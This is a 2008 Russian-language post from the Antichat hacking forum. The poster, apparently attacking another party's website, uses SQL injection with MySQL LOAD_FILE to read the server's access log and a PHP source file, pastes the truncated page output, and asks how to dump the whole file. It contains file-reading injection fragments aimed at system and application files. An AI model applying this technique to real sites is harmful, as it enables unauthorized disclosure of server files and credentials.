25.08.2008, 19:31
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
такс) прошлую проблему решил. теперь столкнулся с другой. вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает. выводятся все записи и тд. в логах нашёл раскрытие путей и вывожу файл допустим такой LOAD_FILE('/home/www/name/name.ru/bla-bla/header.php') на что мне выводится на экран лишь часть аписанного в файле, примерно следующего содержания:
кусок кода страницы без скул-запроса:
<tr><td>
<a href="index.php?page=1&n=11&1187813822"><img src="66" width="90" height="90" border="1"></a>
</td>
<td width="140" class="ch5" valign="top">
<span class="ch2"><b> SQL-inj here</b></span><br>
0<br>
<a href="index.php?page=1&n=11&1187813822" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html> кусок кода страницы с скул-запросом:
<tr><td>
<a href="index.php?page=1&n=11&1187813307"><img src=" ?>>
<head profile="http://123.ru/11/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('htmltype')" width="90" height="90" border="1"></a>
</td>
<td width="140" class="ch5" valign="top">
<span class="ch2"><b><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php languageattributes()</b></span><br>
charset=<?php bloginfo('charset')<br>
<a href="index.php?page=1&n=11&1187813307" class="ch5">view here</a>
</td></tr>
</table> </center>
<br>
</body>
</html> Кусок файла выводится на экран и всё...я так подозреваю, что ф-ция LOAD_FILE встречает какой-то символ и начинает некорректно обрабатывать содержимое файла...
вопрос. как вывести всё содержимое файла? |
|
|